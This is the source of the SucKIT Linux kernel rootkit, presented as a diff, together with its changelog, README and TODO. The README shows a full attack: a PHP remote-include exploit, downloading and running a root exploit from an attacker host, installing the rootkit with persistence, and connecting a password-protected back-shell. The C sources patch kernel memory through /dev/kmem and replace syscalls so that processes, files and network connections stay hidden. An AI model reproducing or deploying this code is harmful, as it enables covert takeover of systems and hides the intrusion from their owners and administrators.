+          .C -> .S, .S -> our_parses -> .s, .s -> binary
+Version 0.06a:
+        - Fixed major bugs with small buffers, added PID hidding and our
+          PID tracking system, leaved from using 'task_struct *current'
+          and other kernel structures, so the code can work on any kernel
+          of 2.2.x without recompilation !
+Version 0.05a:
+        - solved our problem with 'who', we forbid any write to
+          utmp/wtmp/lastlog containing our username ;)
+Version 0.04a:
+        - "backdoor" over fake /etc/passwd for remote services
+          (telnet, rsh, ssh), but we are still visible in `who` ;(
+Version 0.03a:
+        - First relocatable code, we still do only one thing
+          (hiding files), divided into two parts object module
+          (normal, vanilla kernel-LKM ;) and Silvio's kinsmod
+          (which places it to kernel space thru /dev/kmem)
+Version 0.02b:
+        - Finally! We're able to allocate kernel memory thru kmalloc() !
+          But the code does nothing ;(
+Version 0.02a:
+        - First executable code, we're overwriting kernel-code at static
+          address.
+          Fixed one major bug:
+          [rewt@pikatchu ~]# ./suckit
+          bash: ./suckit: No such file or directory
+Version 0.01a:
+        - uhm, no real code, just only concept in my head
+<--> ./doc/CHANGES
+<++> ./doc/README
+suc-kit - Super User Control Kit, (c)ode by sd@sf.cz & devik@cdi.cz, 2001
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Works on: 2.2.x, 2.4.x linux kernels (2.0.x should too, but not tested)
+
+SucKIT
+~~~~~~
+        - Code by sd <sd@sf.cz>, sd@ircnet
+        - kmalloc() & idt/int 0x80 crap by devik <devik@cdi.cz>
+        - Thanks to:
+                Silvio Cesare for his excellent articles
+                halflife (for opening my eyes to look around LKM's)
+                QuantumG for example in STAOG
+
+Description
+~~~~~~~~~~~
+        Suckit (stands for stupid 'super user control kit') is another of
+        thousands linux rootkits, but it's unique in some ways:
+
+Features:
+        - Full password protected remote access connect-back shell
+          initiated by spoofed packet (bypassing most of firewall
+          configurations)
+
+        - Full tty/pty, remote enviroment export + setting up win size
+          while client gets SIGWINCH
+
+        - It can work totally alone (without libs, gcc ...) using only
+          syscalls (this applies only to server side, client is running
+          on your machine, so we can use libc ;)
+
+        - It can hide processes, files and connections
+          (f00led: fuser, lsof, netstat, ps & top)
+
+        - No changes in filesystem
+
+Disadvantages:
+        - Non-portable, i386-linux specific
+
+        - Buggy as hell ;)
+
+Instead of long explaining how to use it, small example is better:
+
+An real example of complete attack (thru PHP bug):
+
+[attacker@badass.cz ~/sk10]$ ./sk c
+* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
+* SUCKIT v1.1c - New, singing, dancing, world-smashing rewtkit  *
+* (c)oded by sd@sf.cz & devik@cdi.cz, 2001                      *
+* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
+Usage:
+./sk [command] [arg]
+Commands:
+  u          uninstall
+  t          test
+  i <pid>    make pid invisible
+  v <pid>    make pid visible (0 = all)
+  f [0/1]    toggle file hiding
+  p [0/1]    toggle proc hiding
+configuration:
+  c <hidestr> <password> <home>
+invoking without args will install rewtkit into memory
+[attacker@badass.cz ~/sk10]$ ./sk c l33t bublifuck /usr/share/man/man4/l33t
+* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
+* SUCKIT v1.1c - New, singing, dancing, world-smashing rewtkit  *
+* (c)oded by sd@sf.cz & devik@cdi.cz, 2001                      *
+* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
+Configuring ./sk:
+OK!
+[attacker@badass.cz ~/sk10]$ telnet lamehost.com 80
+Trying 192.160.0.2...
+Connected to lamehost.com.
+Escape character is '^]'.
+GET /bighole.php3?inc=http://badass.cz/egg.php3 HTTP/1.1
+Host: lamehost.com
+
+HTTP/1.1 200 OK
+Date: Thu, 18 Oct 2001 04:04:52 GMT
+Server: Apache/1.3.14 (Unix)  (Red-Hat/Linux) PHP/4.0.4pl1
+Last-Modified: Fri, 28 Sep 2001 04:42:34 GMT
+ETag: "31c6-c2-3bb3ffba"
+Content-Type: text/html
+
+IT WERKS! Shell at port 8193Connection closed by foreign host.
+[attacker@badass.cz ~/sk10]$ nc -v lamehost.com 8193
+lamehost.com [192.168.0.2] 8193 (?) open
+w
+12:08am  up  1:20,  3 users,  load average: 0.05, 0.06, 0.08
+USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
+root     tty1     -                11:58pm 39:03   3.15s  2.95s  bash
+cd /tmp
+lynx -dump http://badass.cz/s.c > s.c
+gcc s.c -o super-duper-hacker-user-rooter
+./super-duper-hacker-user-rooter
+id
+uid=0(root) gid=0(root) groups=0(root)
+cd /usr/local/man/man4
+mkdir .l33t
+cd .l33t
+lynx -dump http://badass.cz/~attacker/sk10/sk > sk
+chmod +s+u sk
+./sk
+* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
+* SUCKIT v1.1c - New, singing, dancing, world-smashing rewtkit  *
+* (c)oded by sd@sf.cz & devik@cdi.cz, 2001                      *
+* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
+Getting kernel stuff...OK
+page_offset      : 0xc0000000
+sys_call_table[] : 0xc01e5920
+int80h dispatch  : 0xc0106cef
+kmalloc()        : 0xc0127a20
+GFP_KERNEL       : 0x000001f0
+punk_addr        : 0xc010b8e0
+punk_size        : 0x0000001c (28 bytes)
+our kmem region  : 0xc0f94000
+size of our kmem : 0x00003af2 (15090 bytes)
+new_call_table   : 0xc0f968f2
+# of relocs      : 0x0000015d (349)
+# of syscalls    : 0x00000012 (18)
+And nooooow....Shit happens!! -> WE'RE IN <-
+Starting backdoor daemon...OK, pid = 2101
+exit
+exit
+[attacker@badass.cz ~/sk10]$ su
+Password:
+[root@badass.cz ~/sk10]# ./cli lamehost.com
+Looking up badass.cz...OK
+Looking up lamehost.com...OK
+Trying 192.168.0.2.....
+Challenging lamehost.com
+Connected to lamehost.com
+Escape character is '^K'
+Password:
+* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
+* SUCKIT v1.1c - New, singing, dancing, world-smashing rewtkit  *
+* (c)oded by sd@sf.cz & devik@cdi.cz, 2001                      *
+* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
+[rewt@lamehost.com ~]# ps uwxa | grep ps
+[rewt@lamehost.com ~]# cp sk /etc/rc.d/rc3.d/S99l33t
+[rewt@lamehost.com ~]# exit
+
+Connection closed.
+[root@badass.cz ~/sk10]#
+
+...and so on...
+
+-- sd@sf.cz (sd@ircnet)
+<--> ./doc/README
+<++> ./doc/TODO
+- some RSA for communication
+- connection-less TCP for remote shell
+- sniff everything & everywhere (tty's mostly ;)
+- some kinda of spin-locking on SMPs
+<--> ./doc/TODO
+<++> ./include/suckit.h
+/* $Id: suckit.h, core suckit defs */
+
+#ifndef SUCKIT_H
+#define SUCKIT_H
+
+#ifndef __NR_getdents64
+#define __NR_getdents64 220
+#endif
+
+#define OUR_SIGN OURSIGN
+#define RC_FILE RCFILE
+
+#define DEFAULT_HOME    "/usr/share/man/.sd"
+#define DEFAULT_HIDESTR "sk10"
+#define DEFAULT_PASSWD  "bublifuck"
+
+/* cmd stuff */
+#define CMD_TST         1       /* test */
+#define CMD_INV         2       /* make pid invisible */
+#define CMD_VIS         3       /* make pid visible */
+#define CMD_RMV         4       /* remove from memory */
+#define CMD_GFL         5       /* get flags */
+#define CMD_SFL         6       /* set flags */
+#define CMD_BDR         7
+#define SYS_COUNT       256
+
+#define CMD_FLAG_HP     1
+#define CMD_FLAG_HF     2
+
+/* crappy stuff */
+#define BANNER \
+"* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *\n" \
+"* SUCKIT " SUCKIT_VERSION " - New, singing, dancing, world-smashing" \
+" rewtkit  *\n" \
+"* (c)oded by sd@sf.cz & devik@cdi.cz, 2001                      *\n" \
+"* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *\n"
+
+#define BAD1 "/proc/net/tcp"
+#define BAD2 "/proc/net/udp"
+#define BAD3 "/proc/net/raw"
+
+
+/* kernel related stuff */
+#define SYSCALL_INTERRUPT       0x80
+#define KMEM_FILE               "/dev/kmem"
+#define MAX_SYMS                4096
+#define MAX_PID                 512
+#define PUNK                    109 /* victim syscall - old_uname */
+/* for 2.4.x */
+#define KMEM_FLAGS              (0x20 + 0x10 + 0x40 + 0x80 + 0x100)
+
+
+
+/* typedef's */
+#define ulong   unsigned long
+#define uint    unsigned int
+#define ushort  unsigned short
+#define uchar   unsigned char
+struct kernel_sym {
+        ulong   value;
+        uchar   name[60];
+};
+
+
+struct  new_call {
+        uint    nr;
+        void    *handler;
+        void    **old_handler;
+} __attribute__ ((packed));
+
+
+/* this struct __MUST__ correspond with c0r3 header stuff in
+   utils/parse.c ! */
+struct  obj_struc {
+        ulong           obj_len;
+        ulong           bss_len;
+        void            *punk;
+        uint            *punk_size;
+        struct new_call *new_sct;
+        ulong           *sys_call_table;
+        /* these values will be passed to image */
+        ulong           page_offset;
+        ulong           syscall_dispatch;
+        ulong           *old_call_table;
+} __attribute__ ((packed));
+
+
+/* struct for communication between kernel <=> userspace */
+struct  cmd_struc {
+        ulong   id;
+        ulong   cmd;
+        ulong   num;
+        char    buf[1024];
+} __attribute__ ((packed));
+
+
+struct  kma_struc {
+        ulong   (*kmalloc) (uint, int);
+        int     size;
+        int     flags;
+        ulong   mem;
+} __attribute__ ((packed));
+
+struct mmap_arg_struct {
+        unsigned long addr;
+        unsigned long len;
+        unsigned long prot;
+        unsigned long flags;
+        unsigned long fd;
+        unsigned long offset;
+        unsigned long lock;
+};
+
+struct de64 {
+        ulong long      d_ino;
+        ulong long      d_off;
+        unsigned short  d_reclen;
+        uchar           d_type;
+        uchar           d_name[256];
+};
+
+struct de {
+        long            d_ino;
+        uint            d_off;
+        ushort          d_reclen;
+        char            d_name[256];
+};
+
+struct net_struc {
+        int     fd;
+        int     len;
+        int     pos;
+        int     data_len;
+        char    dat[1];
+};
+
+struct pid_struc {
+        ushort  pid;
+        struct  net_struc *net;
+        uchar   hidden;
+} __attribute__ ((packed));
+
+struct  config_struc {
+        uchar   magic[8];
+        uchar   hs[32];
+        uchar   pwd[32];
+        uchar   home[64];
+};
+
+#define mmap_arg ((struct mmap_arg_struct *) \
+                  (page_offset - sizeof(struct mmap_arg_struct)) )
+#define MM_LOCK                 0x1023AFAF
+
+#define PAGE_SIZE               4096
+#define PAGE_RW                 (PROT_READ | PROT_WRITE)
+
+
+
+#ifndef O_RDONLY
+#define O_RDONLY                0
+#endif
+
+#ifndef O_WRONLY
+#define O_WRONLY                1
+#endif
+
+#ifndef O_RWDR
+#define O_RDWR                  2
+#endif
+
+/* debug stuff */
+#ifdef SK_DEBUG
+#define skd(fmt,args...) printf(fmt, args)
+#else
+#define skd(fmt,args...) while (0) {}
+#endif
+
+#endif
+<--> ./include/suckit.h
+<++> ./include/asm.h
+/* $Id: asm.h, assembly related stuff */
+
+#ifndef ASM_H
+#define ASM_H
+struct idtr {
+        unsigned short  limit;
+        unsigned int    base;
+} __attribute__ ((packed));
+
+struct idt {
+        unsigned short  off1;
+        unsigned short  sel;
+        unsigned char   none, flags;
+        unsigned short  off2;
+} __attribute__ ((packed));
+#endif
+<--> ./include/asm.h
+<++> ./include/ip.h
+/* $Id: ip.h, raw TCP/IP stuff */
+
+
+struct  rawdata {
+        ulong   id;
+        ulong   ip;
+        ushort  port;
+};
+
+struct ippkt {
+        struct  ip ip;
+        struct  tcphdr tcp;
+        char    something[12];
+        char    data[1024];
+};
+
+struct pseudohdr {
+        u_int32_t       saddr;
+        u_int32_t       daddr;
+        u_int8_t        zero;
+        u_int8_t        protocol;
+        u_int16_t       lenght;
+};
+
+u_short in_chksum(u_short *ptr, int nbytes)
+{
+  register long           sum;            /* assumes long == 32 bits */
+  u_short                 oddbyte;
+  register u_short        answer;         /* assumes u_short == 16 bits */
+
+  /*
+   * Our algorithm is simple, using a 32-bit accumulator (sum),
+   * we add sequential 16-bit words to it, and at the end, fold back
+   * all the carry bits from the top 16 bits into the lower 16 bits.
+   */
+  sum = 0;
+  while (nbytes > 1)
+  {
+    sum += *ptr++;
+    nbytes -= 2;
+  }
+
+        /* mop up an odd byte, if necessary */
+  if (nbytes == 1)
+  {
+    oddbyte = 0;            /* make sure top half is zero */
+    *((u_char *) &oddbyte) = *(u_char *)ptr;   /* one byte only */
+    sum += oddbyte;
+  }
+
+  /*
+   * Add back carry outs from top 16 bits to low 16 bits.
+   */
+
+  sum  = (sum >> 16) + (sum & 0xffff);    /* add high-16 to low-16 */
+  sum += (sum >> 16);                     /* add carry */
+  answer = ~sum;          /* ones-complement, then truncate to 16 bits */
+
+  return((u_short) answer);
+}
+<--> ./include/ip.h
+<++> ./include/str.h
+/*
+ *  linux/lib/string.c
+ *
+ *  Copyright (C) 1991, 1992  Linus Torvalds
+ */
+
+#ifndef STRING_H
+#define STRING_H
+
+#ifndef NULL
+#define NULL (void *) 0
+#endif
+
+extern char * ___strtok;
+extern char * strpbrk(const char *,const char *);
+extern char * strtok(char *,const char *);
+extern char * strsep(char **,const char *);
+extern unsigned strspn(const char *,const char *);
+extern char * strcpy(char *,const char *);
+extern char * strncpy(char *,const char *, unsigned);
+extern char * strcat(char *, const char *);
+extern char * strncat(char *, const char *, unsigned);
+extern int strcmp(const char *,const char *);
+extern int strncmp(const char *,const char *,unsigned);
+extern int strnicmp(const char *, const char *, unsigned);
+extern char * strchr(const char *,int);
+extern char * strrchr(const char *,int);
+extern char * strstr(const char *,const char *);
+extern unsigned strlen(const char *);
+extern unsigned strnlen(const char *,unsigned);
+extern void * memset(void *,int,unsigned);
+extern void * memcpy(void *,const void *,unsigned);
+extern void * memmove(void *,const void *,unsigned);
+extern void * memscan(void *,int,unsigned);
+extern int memcmp(const void *,const void *,unsigned);
+extern void * memchr(const void *,int,unsigned);
+#endif
+<--> ./include/str.h
+<++> ./src/main.c
+/* $Id: main.c, replacement of libc's main() parent  */
+
+#ifndef MAIN_C
+#define MAIN_C
+#include <stdarg.h>
+#include <linux/unistd.h>
+
+#define MAX_ARGS 255
+
+/* uhh, nice replacement of libc ;) */
+int     _start(char *argv, ...)
+{
+        char    *arg_ptrs[MAX_ARGS];
+        char    *p = argv;
+        int     i = 0;
+        va_list ap;
+
+        va_start(ap, argv);
+        do {
+                arg_ptrs[i] = p;
+                p = va_arg(ap, char *);
+                i++;
+                if (i == MAX_ARGS) break;
+        } while (p);
+
+        _exit(main(i, arg_ptrs));
+}
+#endif
+<--> ./src/main.c
+<++> ./src/kernel.c
+/* $Id: hook.c, kernel related stuff (read, write and so on)  */
+
+#ifndef KERNEL_C
+#define KERNEL_C
+
+/* stuff directly related with kernel */
+#include "suckit.h"
+
+#include "string.c"
+#include "io.c"
+
+/* simple inlines to r/w stuff from/to kernel memory */
+
+/* read data from kmem */
+static inline int rkm(int fd, int offset, void *buf, int size)
+{
+        if (lseek(fd, offset, 0) != offset) return 0;
+        if (read(fd, buf, size) != size) return 0;
+        return size;
+}
+
+/* write data to kmem */
+static inline int wkm(int fd, int offset, void *buf, int size)
+{
+        if (lseek(fd, offset, 0) != offset) return 0;
+        if (write(fd, buf, size) != size) return 0;
+        return size;
+}
+
+/* read int from kmem */
+static inline int rkml(int fd, int offset, ulong *buf)
+{
+        return rkm(fd, offset, buf, sizeof(ulong));
+}
+
+/* write int to kmem */
+static inline int wkml(int fd, int offset, ulong buf)
+{
+        return wkm(fd, offset, &buf, sizeof(ulong));
+}
+
+
+/* relocate given image */
+int     img_reloc(void *img, ulong *reloc_tab, ulong reloc)
+{
+        int     count = 0;
+
+        /* relocate image */
+        while (*reloc_tab != 0xFFFFFFFF) {
+                skd("Relocating %x at %x",
+                        * (ulong *) (((ulong) (img)) + *reloc_tab),
+                        (((ulong) (img)) + *reloc_tab));
+                * (ulong *) (((ulong) (img)) + *reloc_tab) += reloc;
+                skd(" result=%x\n",
+                        * (ulong *) (((ulong) (img)) + *reloc_tab));
+                reloc_tab++;
+                count++;
+        }
+        return count;
+}
+
+#endif
+<--> ./src/kernel.c
+<++> ./src/string.c
+/* $Id: string.c, modified linus' vsprintf.c, thanx to him, whatever */
+
+#ifndef STRING_C
+#define STRING_C
+
+#include "str.h"
+
+char * ___strtok;
+
+int strnicmp(const char *s1, const char *s2, unsigned len)
+{
+        unsigned char c1, c2;
+
+        c1 = 0; c2 = 0;
+
+        if (len) {
+                do {
+                        c1 = *s1; c2 = *s2;
+                        s1++; s2++;
+                        if (!c1)
+                                break;
+                        if (!c2)
+                                break;
+                        if (c1 == c2)
+                                continue;
+                        c1 &= c1 & 0xDF;
+                        c2 &= c2 & 0xDF;
+                        if (c1 != c2)
+                                break;
+                } while (--len);
+        }
+
+        return (int)c1 - (int)c2;
+}
+
+
+inline char * strcpy(char * dest,const char *src)
+{
+        char *tmp = dest;
+
+        while ((*dest++ = *src++) != '\0');
+
+        return tmp;
+}
+
+inline char * strncpy(char * dest,const char *src,unsigned count)
+{
+        char *tmp = dest;
+
+        while (count-- && (*dest++ = *src++) != '\0');
+
+        return tmp;
+}
+
+inline char * strcat(char * dest, const char * src)
+{
+        char *tmp = dest;
+
+        while (*dest)
+                dest++;
+        while ((*dest++ = *src++) != '\0');
+
+        return tmp;
+}
+
+inline char * strncat(char *dest, const char *src, unsigned count)
+{
+        char *tmp = dest;
+
+        if (count) {
+                while (*dest)
+                        dest++;
+                while ((*dest++ = *src++)) {
+                        if (--count == 0) {
+                                *dest = '\0';
+                                break;
+                        }
+                }
+        }
+
+        return tmp;
+}
+
+inline int strcmp(const char * cs,const char * ct)
+{
+        register signed char __res;
+
+        while (1) {
+                if ((__res = *cs - *ct++) != 0 || !*cs++)
+                        break;
+        }
+
+        return __res;
+}
+
+inline int strncmp(const char * cs,const char * ct,unsigned count)
+{
+        register signed char __res = 0;
+
+        while (count) {
+                if ((__res = *cs - *ct++) != 0 || !*cs++)
+                        break;
+                count--;
+        }
+
+        return __res;
+}
+
+char * strchr(const char * s, int c)
+{
+        for(; *s != (char) c; ++s)
+                if (*s == '\0')
+                        return NULL;
+        return (char *) s;
+}
+
+char * strrchr(const char * s, int c)
+{
+       const char *p = s + strlen(s);
+       do {
+           if (*p == (char)c)
+               return (char *)p;
+       } while (--p >= s);
+       return NULL;
+}
+
+unsigned strlen(const char * s)
+{
+        const char *sc;
+
+        for (sc = s; *sc != '\0'; ++sc)
+                /* nothing */;
+        return sc - s;
+}
+
+unsigned strnlen(const char * s, unsigned count)
+{
+        const char *sc;
+
+        for (sc = s; count-- && *sc != '\0'; ++sc)
+                /* nothing */;
+        return sc - s;
+}
+
+unsigned strspn(const char *s, const char *accept)
+{
+        const char *p;
+        const char *a;
+        unsigned count = 0;
+
+        for (p = s; *p != '\0'; ++p) {
+                for (a = accept; *a != '\0'; ++a) {
+                        if (*p == *a)
+                                break;
+                }
+                if (*a == '\0')
+                        return count;
+                ++count;
+        }
+
+        return count;
+}
+
+char * strpbrk(const char * cs, const char * ct)
+{
+        const char *sc1,*sc2;
+
+        for( sc1 = cs; *sc1 != '\0'; ++sc1) {
+                for( sc2 = ct; *sc2 != '\0'; ++sc2) {
+                        if (*sc1 == *sc2)
+                                return (char *) sc1;
+                }
+        }
+        return NULL;
+}
+
+char * strtok(char * s,const char * ct)
+{
+        char *sbegin, *send;
+
+        sbegin  = s ? s : ___strtok;
+        if (!sbegin) {
+                return NULL;
+        }
+        sbegin += strspn(sbegin,ct);
+        if (*sbegin == '\0') {
+                ___strtok = NULL;
+                return( NULL );
+        }
+        send = strpbrk( sbegin, ct);
+        if (send && *send != '\0')
+                *send++ = '\0';
+        ___strtok = send;
+        return (sbegin);
+}
+
+char * strsep(char **s, const char *ct)
+{
+        char *sbegin = *s, *end;
+
+        if (sbegin == NULL)
+                return NULL;
+
+        end = strpbrk(sbegin, ct);
+        if (end)
+                *end++ = '\0';
+        *s = end;
+
+        return sbegin;
+}
+
+inline void * memset(void * s,int c,unsigned count)
+{
+        char *xs = (char *) s;
+
+        while (count--)
+                *xs++ = c;
+
+        return s;
+}
+
+inline void bzero(void *s, unsigned count)
+{
+        memset(s, 0, count);
+}
+
+char * bcopy(const char * src, char * dest, int count)
+{
+        char *tmp = dest;
+
+        while (count--)
+                *tmp++ = *src++;
+
+        return dest;
+}
+
+inline void * memcpy(void * dest,const void *src,unsigned count)
+{
+        char *tmp = (char *) dest, *s = (char *) src;
+
+        while (count--)
+                *tmp++ = *s++;
+
+        return dest;
+}
+
+inline void * memmove(void * dest,const void *src,unsigned count)
+{
+        char *tmp, *s;
+
+        if (dest <= src) {
+                tmp = (char *) dest;
+                s = (char *) src;
+                while (count--)
+                        *tmp++ = *s++;
+                }
+        else {
+                tmp = (char *) dest + count;
+                s = (char *) src + count;
+                while (count--)
+                        *--tmp = *--s;
+                }
+
+        return dest;
+}
+
+int memcmp(const void * cs,const void * ct,unsigned count)
+{
+        const unsigned char *su1, *su2;
+        signed char res = 0;
+
+        for( su1 = cs, su2 = ct; 0 < count; ++su1, ++su2, count--)
+                if ((res = *su1 - *su2) != 0)
+                        break;
+        return res;
+}
+
+void * memscan(void * addr, int c, unsigned size)
+{
+        unsigned char * p = (unsigned char *) addr;
+
+        while (size) {
+                if (*p == c)
+                        return (void *) p;
+                p++;
+                size--;
+        }
+        return (void *) p;
+}
+
+char * strstr(const char * s1,const char * s2)
+{
+        int l1, l2;
+
+        l2 = strlen(s2);
+        if (!l2)
+                return (char *) s1;
+        l1 = strlen(s1);
+        while (l1 >= l2) {
+                l1--;
+                if (!memcmp(s1,s2,l2))
+                        return (char *) s1;
+                s1++;
+        }
+        return NULL;
+}
+
+void * memmem(char *s1, int l1, char *s2, int l2)
+{
+        if (!l2) return s1;
+        while (l1 >= l2) {
+                l1--;
+                if (!memcmp(s1,s2,l2))
+                        return s1;
+                s1++;
+        }
+        return NULL;
+}
+
+void *memchr(const void *s, int c, unsigned n)
+{
+        const unsigned char *p = s;
+        while (n-- != 0) {
+                if ((unsigned char)c == *p++) {
+                        return (void *)(p-1);
+                }
+        }
+        return NULL;
+}
+#endif
+<--> ./src/string.c
+<++> ./src/core.c
+/* $Id: core.c, mainly our syscalls */
+
+#ifndef CORE_C
+#define CORE_C
+
+#include <stdarg.h>
+#include <linux/unistd.h>
+#include <asm/ptrace.h>
+#include <asm/mman.h>
+#include <asm/errno.h>
+#include <asm/stat.h>
+#include <linux/if.h>
+
+
+#include "suckit.h"
+#include "string.c"
+#include "vsprintf.c"
+#include "io.c"
+
+/* ehrm, ,,exports'' ;)) */
+extern  ulong   page_offset;
+extern  ulong   syscall_dispatch;
+extern  ulong   old_call_table;
+
+/* set this to 1 if u wanna to debug something, don't forget
+   to change addr of printk (cat /proc/ksyms | grep printk) */
+#if 0
+int (*printk) (char *fmt, ...) = (void *) 0xc0113710;
+#define crd(fmt,args...) printk(__FUNCTION__ "():" fmt "\n", args)
+#else
+#define crd(fmt,args...) while (0) {}
+#endif
+
+
+#define mmap_arg ((struct mmap_arg_struct *) \
+                  (page_offset - sizeof(struct mmap_arg_struct)) )
+
+/* new_XXX & old_XXX pair for some syscall */
+#define ds(type,name,args...) type new_##name(args); \
+                              type (*old_##name)(args)
+/* only old_XXX def in order to import some syscall) */
+#define is(type,name,args...) type (*old_##name)(args)
+
+/* syscall defs */
+ds(int, olduname,       char *);
+ds(int, fork,           struct pt_regs);
+ds(int, clone,          struct pt_regs);
+ds(int, open,           char *, int, int);
+ds(int, close,          int);
+ds(int, read,           int, char *, uint);
+ds(int, kill,           int, int);
+ds(int, getdents,       uint, struct de *, int count);
+ds(int, getdents64,     uint, struct de64 *, int count);
+ds(int, ioctl,          uint, uint, ulong);
+
+/* import various syscall to avoid using int 0x80 from syscall handlers */
+is(int, stat,           char *, struct stat *);
+is(int, fstat,          int, struct stat *);
+is(void *, mmap,        struct mmap_arg_struct *);
+is(int, munmap,         ulong, uint);
+is(int, getpid,         void);
+is(int, readdir,        uint, struct de *, uint);
+is(int, readlink,       char *, char *, uint);
+is(int, lseek,          int, int, int);
+
+
+/* syscall replacement table (requiered by hook.c) */
+#define repsc(x)        {__NR_##x, (void *) new_##x, (void **) &old_##x},
+#define impsc(x)        {__NR_##x, (void *) NULL, (void **) &old_##x},
+struct  new_call        new_sct[] = {
+        repsc(olduname)
+        repsc(fork)
+        repsc(clone)
+        repsc(open)
+        repsc(close)
+        repsc(read)
+        repsc(kill)
+        repsc(getdents)
+        repsc(getdents64)
+        repsc(ioctl)
+        impsc(stat)
+        impsc(fstat)
+        impsc(mmap)
+        impsc(munmap)
+        impsc(getpid)
+        impsc(readdir)
+        impsc(readlink)
+        impsc(lseek)
+        {0}
+};
+
+/* our fake sys_call_table[] ;) */
+ulong   sys_call_table[SYS_COUNT];
+
+/* our table of hidden pid's */
+struct  pid_struc pid_tab[MAX_PID];
+
+/* "bad" files ;) */
+int     bdev = -1, bad1 = -1, bad2 = -1, bad3 = -1;
+
+/* our flags */
+ulong   our_flags = CMD_FLAG_HP | CMD_FLAG_HF;
+int     backdoor_pid = 0;
+
+struct  config_struc    cfg = {"CFGMAGIC", ".sd", "", ""};
+
+#define HIDE_FILES      (our_flags & CMD_FLAG_HF)
+#define HIDE_PROCS      (our_flags & CMD_FLAG_HP)
+
+/* replacement of olduname, allocates some memory in kernel space */
+int     punk(struct kma_struc *k)
+{
+        k->mem = k->kmalloc(k->size, k->flags);
+        return 0;
+}
+
+/***************************** helper fn's ********************* */
+uint    my_atoi(char *n)
+{
+        register uint ret = 0;
+        while ((((*n) < '0') || ((*n) > '9')) && (*n))
+                n++;
+        while ((*n) >= '0' && (*n) <= '9')
+                ret = ret * 10 + (*n++) - '0';
+        return ret;
+}
+
+
+/* u-alloc, 'u' stands for 'ugly' ;) */
+void   *ualloc(ulong size)
+{
+        void   *ret;
+        struct mmap_arg_struct  msave;
+
+        while (mmap_arg->lock == MM_LOCK);
+        memcpy(&msave, mmap_arg, sizeof(struct mmap_arg_struct));
+        mmap_arg->lock = MM_LOCK;
+        mmap_arg->addr = 0;
+        mmap_arg->len = (PAGE_SIZE + size - 1) & ~PAGE_SIZE;
+        mmap_arg->prot = PAGE_RW;
+        mmap_arg->flags = MAP_PRIVATE | MAP_ANONYMOUS;
+        mmap_arg->fd = 0;
+        mmap_arg->offset = 0;
+        ret = old_mmap(mmap_arg);
+        memcpy(mmap_arg, &msave, sizeof(struct mmap_arg_struct));
+        if ((ulong) ret > 0xffff0000)
+                return NULL;
+        return ret;
+}
+
+static inline void    ufree(void *ptr, ulong size)
+{
+        if (ptr) {
+                old_munmap((ulong) ptr,
+                           (PAGE_SIZE + size - 1) & ~PAGE_SIZE);
+        }
+}
+
+/* basic fn's */
+static inline struct pid_struc *find_pid(int pid)
+{
+        int     i;
+        for (i = 0; i < MAX_PID; i++) {
+                if (pid_tab[i].pid == pid)
+                        return &pid_tab[i];
+        }
+        return NULL;
+}
+
+
+
+struct pid_struc *add_pid(int pid)
+{
+        struct  pid_struc *p = find_pid(pid);
+        int     i;
+        if (p) {
+                return p;
+        } else {
+                for (i = 0; i < MAX_PID; i++) {
+                        if (!pid_tab[i].pid) {
+                                bzero((char *) &pid_tab[i],
+                                      sizeof(struct pid_struc));
+                                pid_tab[i].pid = pid;
+                                return &pid_tab[i];
+                        }
+                }
+        }
+        return NULL;
+}
+
+static inline struct pid_struc *hide_pid(int pid)
+{
+        struct  pid_struc *p = add_pid(pid);
+        if (p) {
+                p->hidden = 1;
+        }
+        crd("%d = 0x%x", pid, p);
+        return p;
+}
+
+
+struct pid_struc *del_pid(int pid)
+{
+        struct  pid_struc *p = find_pid(pid);
+        if (p) p->pid = 0;
+        return p;
+}
+
+int unhide_pid(int pid)
+{
+        int     i;
+        if (pid == 0) {
+                for (i = 0; i < MAX_PID; i++) {
+                        del_pid(pid_tab[i].pid);
+                }
+                return 1;
+        }
+        return (del_pid(pid) != NULL);
+}
+
+
+void    sync_pid_tab(void)
+{
+        int     i;
+        /* remove unused entries in order to avoid to become full */
+        for (i = 0; i < MAX_PID; i++) {
+                if ((pid_tab[i].pid) &&
+                    (old_kill(pid_tab[i].pid, 0) == -ESRCH)) {
+                        bzero((char *) &pid_tab[i],
+                              sizeof(struct pid_struc));
+                }
+        }
+}
+
+static inline struct pid_struc *curr_pid(void)
+{
+        return find_pid(old_getpid());
+}
+
+/* this creates table ("cache") of sockets owned by invisible processes */
+int     create_net_tab(int *tab, int max, struct de *de, char *buf)
+{
+        int     i;
+        int     fd;
+        int     cnt = 0;
+
+        crd("tab=0x%x, max=%d, de=0x%x, buf=0x%x", tab, max, de, buf);
+        for (i = 0; i < MAX_PID; i++) {
+                if (pid_tab[i].pid && pid_tab[i].hidden) {
+                        char   *zptr;
+                        zptr = buf +
+                               sprintf(buf, "/proc/%d/fd", pid_tab[i].pid);
+                        crd("buf=%s (0x%x), zptr=0x%x", buf, buf, zptr);
+                        fd = old_open(buf, O_RDONLY, 0);
+                        if (fd < 0)
+                                continue;
+                        *zptr++ = '/';
+                        while (old_readdir(fd, de, sizeof(struct de)) == 1)
+                                {
+                                strcpy(zptr, de->d_name);
+                                if (old_readlink(buf, &buf[64], 64) > 0) {
+                                        if (!strncmp
+                                            (&buf[64], "socket:[", 8)) {
+                                                tab[cnt++] =
+                                                    my_atoi(&buf[64]);
+                                                if (cnt >= max) {
+                                                        close(fd);
+                                                        return cnt;
+                                                }
+                                        }       /* if strncmp .. */
+                                }       /* if readlink .. */
+                        }       /* if readdir */
+                        old_close(fd);
+                }       /* if hidden */
+        }       /* for (i < pid_count ... */
+        return cnt;
+}
+
+static inline int     invisible_socket(int nr, int *tab, int max)
+{
+        int     i;
+        for (i = 0; i < max; i++) {
+                if (tab[i] == nr)
+                        return 1;
+        }
+        return 0;
+}
+
